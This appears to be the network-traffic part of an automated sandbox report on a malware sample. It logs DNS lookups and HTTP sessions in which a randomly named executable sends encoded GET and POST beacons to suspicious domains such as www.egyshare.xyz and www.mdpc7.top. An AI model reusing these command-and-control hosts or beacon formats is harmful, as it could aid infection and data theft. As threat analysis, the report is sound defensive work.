Nov 18, 2024 13:14:41.443310976 CET | 80 | 53176 | 203.161.46.205 | 192.168.2.7
Nov 18, 2024 13:14:41.443470001 CET | 53176 | 80 | 192.168.2.7 | 203.161.46.205
Nov 18, 2024 13:14:41.443470955 CET | 53176 | 80 | 192.168.2.7 | 203.161.46.205
Nov 18, 2024 13:14:41.479274988 CET | 53176 | 80 | 192.168.2.7 | 203.161.46.205
Nov 18, 2024 13:14:41.484229088 CET | 80 | 53176 | 203.161.46.205 | 192.168.2.7
Nov 18, 2024 13:14:47.566432953 CET | 53177 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:47.571290016 CET | 80 | 53177 | 20.2.36.112 | 192.168.2.7
Nov 18, 2024 13:14:47.571377039 CET | 53177 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:47.588737011 CET | 53177 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:47.594852924 CET | 80 | 53177 | 20.2.36.112 | 192.168.2.7
Nov 18, 2024 13:14:48.539200068 CET | 80 | 53177 | 20.2.36.112 | 192.168.2.7
Nov 18, 2024 13:14:48.594377041 CET | 53177 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:48.712409973 CET | 80 | 53177 | 20.2.36.112 | 192.168.2.7
Nov 18, 2024 13:14:48.712469101 CET | 53177 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:49.094593048 CET | 53177 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:50.114340067 CET | 53178 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:50.119262934 CET | 80 | 53178 | 20.2.36.112 | 192.168.2.7
Nov 18, 2024 13:14:50.119369030 CET | 53178 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:50.135369062 CET | 53178 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:50.140549898 CET | 80 | 53178 | 20.2.36.112 | 192.168.2.7
Nov 18, 2024 13:14:51.087090015 CET | 80 | 53178 | 20.2.36.112 | 192.168.2.7
Nov 18, 2024 13:14:51.141237020 CET | 53178 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:51.270575047 CET | 80 | 53178 | 20.2.36.112 | 192.168.2.7
Nov 18, 2024 13:14:51.270694017 CET | 53178 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:51.641465902 CET | 53178 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:52.660985947 CET | 53179 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:52.665791988 CET | 80 | 53179 | 20.2.36.112 | 192.168.2.7
Nov 18, 2024 13:14:52.665941000 CET | 53179 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:52.689707994 CET | 53179 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:52.694529057 CET | 80 | 53179 | 20.2.36.112 | 192.168.2.7
Nov 18, 2024 13:14:52.694641113 CET | 80 | 53179 | 20.2.36.112 | 192.168.2.7
Nov 18, 2024 13:14:53.614986897 CET | 80 | 53179 | 20.2.36.112 | 192.168.2.7
Nov 18, 2024 13:14:53.656857014 CET | 53179 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:53.794075012 CET | 80 | 53179 | 20.2.36.112 | 192.168.2.7
Nov 18, 2024 13:14:53.794166088 CET | 53179 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:54.206581116 CET | 53179 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:55.223345041 CET | 53180 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:55.228281975 CET | 80 | 53180 | 20.2.36.112 | 192.168.2.7
Nov 18, 2024 13:14:55.228373051 CET | 53180 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:55.238636017 CET | 53180 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:55.243562937 CET | 80 | 53180 | 20.2.36.112 | 192.168.2.7
Nov 18, 2024 13:14:56.188889027 CET | 80 | 53180 | 20.2.36.112 | 192.168.2.7
Nov 18, 2024 13:14:56.235003948 CET | 53180 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:56.369296074 CET | 80 | 53180 | 20.2.36.112 | 192.168.2.7
Nov 18, 2024 13:14:56.369416952 CET | 53180 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:56.370619059 CET | 53180 | 80 | 192.168.2.7 | 20.2.36.112
Nov 18, 2024 13:14:56.375508070 CET | 80 | 53180 | 20.2.36.112 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 18, 2024 13:12:29.038666010 CET | 53 | 54314 | 162.159.36.2 | 192.168.2.7
Nov 18, 2024 13:12:29.703105927 CET | 51797 | 53 | 192.168.2.7 | 1.1.1.1
Nov 18, 2024 13:12:29.710988045 CET | 53 | 51797 | 1.1.1.1 | 192.168.2.7
Nov 18, 2024 13:12:46.355175018 CET | 61434 | 53 | 192.168.2.7 | 1.1.1.1
Nov 18, 2024 13:12:46.398941994 CET | 53 | 61434 | 1.1.1.1 | 192.168.2.7
Nov 18, 2024 13:12:51.412318945 CET | 51151 | 53 | 192.168.2.7 | 1.1.1.1
Nov 18, 2024 13:12:52.408298969 CET | 53 | 51151 | 1.1.1.1 | 192.168.2.7
Nov 18, 2024 13:13:08.691484928 CET | 61371 | 53 | 192.168.2.7 | 1.1.1.1
Nov 18, 2024 13:13:08.738291025 CET | 53 | 61371 | 1.1.1.1 | 192.168.2.7
Nov 18, 2024 13:13:22.142508030 CET | 62338 | 53 | 192.168.2.7 | 1.1.1.1
Nov 18, 2024 13:13:22.166404963 CET | 53 | 62338 | 1.1.1.1 | 192.168.2.7
Nov 18, 2024 13:13:36.662897110 CET | 63041 | 53 | 192.168.2.7 | 1.1.1.1
Nov 18, 2024 13:13:36.702223063 CET | 53 | 63041 | 1.1.1.1 | 192.168.2.7
Nov 18, 2024 13:13:50.066555977 CET | 60934 | 53 | 192.168.2.7 | 1.1.1.1
Nov 18, 2024 13:13:50.549628019 CET | 53 | 60934 | 1.1.1.1 | 192.168.2.7
Nov 18, 2024 13:14:04.113531113 CET | 53336 | 53 | 192.168.2.7 | 1.1.1.1
Nov 18, 2024 13:14:04.154090881 CET | 53 | 53336 | 1.1.1.1 | 192.168.2.7
Nov 18, 2024 13:14:18.207160950 CET | 61691 | 53 | 192.168.2.7 | 1.1.1.1
Nov 18, 2024 13:14:18.274432898 CET | 53 | 61691 | 1.1.1.1 | 192.168.2.7
Nov 18, 2024 13:14:32.203596115 CET | 58080 | 53 | 192.168.2.7 | 1.1.1.1
Nov 18, 2024 13:14:32.911565065 CET | 53 | 58080 | 1.1.1.1 | 192.168.2.7
Nov 18, 2024 13:14:46.488929033 CET | 52491 | 53 | 192.168.2.7 | 1.1.1.1
Nov 18, 2024 13:14:47.500874043 CET | 52491 | 53 | 192.168.2.7 | 1.1.1.1
Nov 18, 2024 13:14:47.563998938 CET | 53 | 52491 | 1.1.1.1 | 192.168.2.7
Nov 18, 2024 13:14:47.564030886 CET | 53 | 52491 | 1.1.1.1 | 192.168.2.7
Nov 18, 2024 13:15:02.144870043 CET | 55845 | 53 | 192.168.2.7 | 1.1.1.1
Nov 18, 2024 13:15:03.156964064 CET | 55845 | 53 | 192.168.2.7 | 1.1.1.1
Nov 18, 2024 13:15:04.172602892 CET | 55845 | 53 | 192.168.2.7 | 1.1.1.1
Nov 18, 2024 13:15:04.334398985 CET | 53 | 55845 | 1.1.1.1 | 192.168.2.7
Nov 18, 2024 13:15:04.334430933 CET | 53 | 55845 | 1.1.1.1 | 192.168.2.7
Nov 18, 2024 13:15:04.334440947 CET | 53 | 55845 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 18, 2024 13:12:29.703105927 CET | 192.168.2.7 | 1.1.1.1 | 0x2ec7 | Standard query (0) | 15.164.165.52.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Nov 18, 2024 13:12:46.355175018 CET | 192.168.2.7 | 1.1.1.1 | 0x150e | Standard query (0) | www.uynline.shop | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:12:51.412318945 CET | 192.168.2.7 | 1.1.1.1 | 0xc511 | Standard query (0) | www.ytsd88.top | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:13:08.691484928 CET | 192.168.2.7 | 1.1.1.1 | 0xbee3 | Standard query (0) | www.egyshare.xyz | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:13:22.142508030 CET | 192.168.2.7 | 1.1.1.1 | 0x4cae | Standard query (0) | www.bionanosolutions.info | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:13:36.662897110 CET | 192.168.2.7 | 1.1.1.1 | 0xd3ea | Standard query (0) | www.tals.xyz | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:13:50.066555977 CET | 192.168.2.7 | 1.1.1.1 | 0x4f74 | Standard query (0) | www.cssa.auction | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:14:04.113531113 CET | 192.168.2.7 | 1.1.1.1 | 0x235a | Standard query (0) | www.acc888ommodate.xyz | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:14:18.207160950 CET | 192.168.2.7 | 1.1.1.1 | 0x3c1a | Standard query (0) | www.070002018.xyz | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:14:32.203596115 CET | 192.168.2.7 | 1.1.1.1 | 0x9194 | Standard query (0) | www.startvin.top | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:14:46.488929033 CET | 192.168.2.7 | 1.1.1.1 | 0xf635 | Standard query (0) | www.mdpc7.top | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:14:47.500874043 CET | 192.168.2.7 | 1.1.1.1 | 0xf635 | Standard query (0) | www.mdpc7.top | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:15:02.144870043 CET | 192.168.2.7 | 1.1.1.1 | 0x4b25 | Standard query (0) | www.phoenix88.sbs | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:15:03.156964064 CET | 192.168.2.7 | 1.1.1.1 | 0x4b25 | Standard query (0) | www.phoenix88.sbs | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:15:04.172602892 CET | 192.168.2.7 | 1.1.1.1 | 0x4b25 | Standard query (0) | www.phoenix88.sbs | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 18, 2024 13:12:29.710988045 CET | 1.1.1.1 | 192.168.2.7 | 0x2ec7 | Name error (3) | 15.164.165.52.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Nov 18, 2024 13:12:46.398941994 CET | 1.1.1.1 | 192.168.2.7 | 0x150e | No error (0) | www.uynline.shop | uynline.shop | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 13:12:52.408298969 CET | 1.1.1.1 | 192.168.2.7 | 0xc511 | No error (0) | www.ytsd88.top | | 47.76.213.197 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:13:08.738291025 CET | 1.1.1.1 | 192.168.2.7 | 0xbee3 | No error (0) | www.egyshare.xyz | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:13:08.738291025 CET | 1.1.1.1 | 192.168.2.7 | 0xbee3 | No error (0) | www.egyshare.xyz | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:13:22.166404963 CET | 1.1.1.1 | 192.168.2.7 | 0x4cae | No error (0) | www.bionanosolutions.info | | 176.117.73.104 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:13:36.702223063 CET | 1.1.1.1 | 192.168.2.7 | 0xd3ea | No error (0) | www.tals.xyz | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:13:36.702223063 CET | 1.1.1.1 | 192.168.2.7 | 0xd3ea | No error (0) | www.tals.xyz | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:13:50.549628019 CET | 1.1.1.1 | 192.168.2.7 | 0x4f74 | No error (0) | www.cssa.auction | cssa.auction | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 13:13:50.549628019 CET | 1.1.1.1 | 192.168.2.7 | 0x4f74 | No error (0) | cssa.auction | | 107.167.84.42 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:14:04.154090881 CET | 1.1.1.1 | 192.168.2.7 | 0x235a | No error (0) | www.acc888ommodate.xyz | | 176.32.38.130 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:14:18.274432898 CET | 1.1.1.1 | 192.168.2.7 | 0x3c1a | No error (0) | www.070002018.xyz | | 161.97.142.144 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:14:32.911565065 CET | 1.1.1.1 | 192.168.2.7 | 0x9194 | No error (0) | www.startvin.top | | 203.161.46.205 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:14:47.563998938 CET | 1.1.1.1 | 192.168.2.7 | 0xf635 | No error (0) | www.mdpc7.top | mmd.dnsmmd.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 13:14:47.563998938 CET | 1.1.1.1 | 192.168.2.7 | 0xf635 | No error (0) | mmd.dnsmmd.com | | 20.2.36.112 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:14:47.563998938 CET | 1.1.1.1 | 192.168.2.7 | 0xf635 | No error (0) | mmd.dnsmmd.com | | 20.2.113.172 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:14:47.564030886 CET | 1.1.1.1 | 192.168.2.7 | 0xf635 | No error (0) | www.mdpc7.top | mmd.dnsmmd.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 13:14:47.564030886 CET | 1.1.1.1 | 192.168.2.7 | 0xf635 | No error (0) | mmd.dnsmmd.com | | 20.2.36.112 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:14:47.564030886 CET | 1.1.1.1 | 192.168.2.7 | 0xf635 | No error (0) | mmd.dnsmmd.com | | 20.2.113.172 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:15:04.334398985 CET | 1.1.1.1 | 192.168.2.7 | 0x4b25 | No error (0) | www.phoenix88.sbs | phoenix88.sbs | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 13:15:04.334398985 CET | 1.1.1.1 | 192.168.2.7 | 0x4b25 | No error (0) | phoenix88.sbs | | 88.99.61.52 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:15:04.334430933 CET | 1.1.1.1 | 192.168.2.7 | 0x4b25 | No error (0) | www.phoenix88.sbs | phoenix88.sbs | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 13:15:04.334430933 CET | 1.1.1.1 | 192.168.2.7 | 0x4b25 | No error (0) | phoenix88.sbs | | 88.99.61.52 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:15:04.334440947 CET | 1.1.1.1 | 192.168.2.7 | 0x4b25 | No error (0) | www.phoenix88.sbs | phoenix88.sbs | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 13:15:04.334440947 CET | 1.1.1.1 | 192.168.2.7 | 0x4b25 | No error (0) | phoenix88.sbs | | 88.99.61.52 | A (IP address) | IN (0x0001) | false
                                                                  • www.ytsd88.top
                                                                  • www.egyshare.xyz
                                                                  • www.bionanosolutions.info
                                                                  • www.tals.xyz
                                                                  • www.cssa.auction
                                                                  • www.acc888ommodate.xyz
                                                                  • www.070002018.xyz
                                                                  • www.startvin.top
                                                                  • www.mdpc7.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 53115 | 47.76.213.197 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 18, 2024 13:12:52.512556076 CET539OUTGET /yysf/?0PIXBf9=6v+kdCMiu5/5470MX9lzQyj8/+WeB1VHD3zgv43+rVSd7gkLKIFyovo7JjBoxgRqvXZx1v1SEu244MoSpwzCrGiBlqOxipli+BYTnOI67OOyvHeuq/FHXkVErKkJ9HuzEweZBdUTs+cq&tD_=f00xUVKh HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Connection: close
                                                                  Host: www.ytsd88.top
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Nov 18, 2024 13:12:53.441814899 CET | 574 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 18 Nov 2024 12:12:53 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 409
                                                                  Connection: close
                                                                  ETag: "66d016cf-199"
                                                                  Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  1 | 192.168.2.7 | 53149 | 13.248.169.48 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 18, 2024 13:13:08.760742903 CET | 804 | OUT | POST /lu7u/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 220
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.egyshare.xyz
                                                                  Origin: http://www.egyshare.xyz
                                                                  Referer: http://www.egyshare.xyz/lu7u/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Ascii: 0PIXBf9=/b7GgiOck6SK8DBqVvP6pyZHgSFaQxjHyd7xpGPhJzRQ6g1yRJKbPvPbMd3D8OfhMb6+MBfG1QJijCM3zg8HUHj7cHExIzEmyE4wtqUGWPG8gJW1OZC/fwP5IOgZVpbJXGwO1EY/QzLnwbzXo4WOwKpTqrHOW9crr37se7E+ojuJ0lM9p3IFLNa5panVJPW55uAov5KUiyoVOTLx8w==


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  2 | 192.168.2.7 | 53150 | 13.248.169.48 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 18, 2024 13:13:11.312334061 CET | 824 | OUT | POST /lu7u/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 240
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.egyshare.xyz
                                                                  Origin: http://www.egyshare.xyz
                                                                  Referer: http://www.egyshare.xyz/lu7u/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Ascii: 0PIXBf9=/b7GgiOck6SKtRVqONn6vSZEsyFaZRjDydnxpC/xJFhQ7E5yQNebIvPbH93KxuejMb3LMAjG1QNijAU3zR8ESXj9VnEzLDEmyE4wtqosWPe8g5m1N8++EQP6e+gZRpb3XGw41AAZQxjnweXXppWB+KpRnLGJSIp7rVHPXbQbwTuZ1TNfzVEpVciCtYDjepLM7vEwib+19FN/DBq1qNfrHH3a10phzJXMGSKc7is=


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  3 | 192.168.2.7 | 53151 | 13.248.169.48 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 18, 2024 13:13:13.867085934 CET | 1837 | OUT | POST /lu7u/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 1252
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.egyshare.xyz
                                                                  Origin: http://www.egyshare.xyz
                                                                  Referer: http://www.egyshare.xyz/lu7u/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  4 | 192.168.2.7 | 53152 | 13.248.169.48 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 18, 2024 13:13:16.408215046 CET | 541 | OUT | GET /lu7u/?tD_=f00xUVKh&0PIXBf9=yZTmjXW21Nq5wh91IMf/kDRGkUZ+XT2lkv3n4X6DMmMz0B5xbYyQHfDnacj01uuzec64BAri/1xnyBkH0yVWWE7yUWUVCQJ95ExXsfUTBKKOk42MManlE2uXf/wCPPD1XSw9siMiJ2ze HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Connection: close
                                                                  Host: www.egyshare.xyz
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Nov 18, 2024 13:13:17.060798883 CET | 416 | IN | HTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Mon, 18 Nov 2024 12:13:16 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 276
                                                                  Connection: close
                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?tD_=f00xUVKh&0PIXBf9=yZTmjXW21Nq5wh91IMf/kDRGkUZ+XT2lkv3n4X6DMmMz0B5xbYyQHfDnacj01uuzec64BAri/1xnyBkH0yVWWE7yUWUVCQJ95ExXsfUTBKKOk42MManlE2uXf/wCPPD1XSw9siMiJ2ze"}</script></head></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  5 | 192.168.2.7 | 53153 | 176.117.73.104 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 18, 2024 13:13:22.397254944 CET | 831 | OUT | POST /i6zb/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 220
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.bionanosolutions.info
                                                                  Origin: http://www.bionanosolutions.info
                                                                  Referer: http://www.bionanosolutions.info/i6zb/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Ascii: 0PIXBf9=3Def45YX7+lAkyrAbwq9htFSi/WlAHND1PScguDfmJ0002EDvUq806WTG1/+xNhQhRlQ4+Uv7OY3c+OZn5gPlGti89YmSlFsgde/uQb6m+jufaS87Mt1NqzwphbxRFqvgH18S2JJdiodmIhzXbZSgCcOBshs3nC8P+zQFX3Trz04bkv200wnZ+n2uVqz5VP1TDWYR6OAD7knqnaPOw==
                                                                  Nov 18, 2024 13:13:23.041517973 CET | 711 | IN | HTTP/1.1 405 Not Allowed
                                                                  Server: nginx/1.26.2
                                                                  Date: Mon, 18 Nov 2024 12:13:22 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 559
                                                                  Connection: close
                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  6 | 192.168.2.7 | 53154 | 176.117.73.104 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 18, 2024 13:13:24.992558002 CET | 851 | OUT | POST /i6zb/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 240
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.bionanosolutions.info
                                                                  Origin: http://www.bionanosolutions.info
                                                                  Referer: http://www.bionanosolutions.info/i6zb/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Ascii: 0PIXBf9=3Def45YX7+lAkSbAIDy9ptFd8vWlZ3NH1PecgqTxm6A00T4D9mS8h6WTSF//s9hlhR5Y4+ov7O83c++ZnO0Mq2tgltYkcFFsgde/uQnAm+LuD4G89oZ0AKzzhBbxA1qrgH0ZSzp3dgQdmJRzXvFRrCcMOMhy+1fmCObzKB/Uui0kaSuUuW8LHvfNqXOFuzSARCSAcY6hcMBNn17LYEVr2F7p01jaMKeFDFFCXjc=
                                                                  Nov 18, 2024 13:13:25.766143084 CET | 711 | IN | HTTP/1.1 405 Not Allowed
                                                                  Server: nginx/1.26.2
                                                                  Date: Mon, 18 Nov 2024 12:13:25 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 559
                                                                  Connection: close
                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  7 | 192.168.2.7 | 53155 | 176.117.73.104 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 18, 2024 13:13:27.777478933 CET | 1864 | OUT | POST /i6zb/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
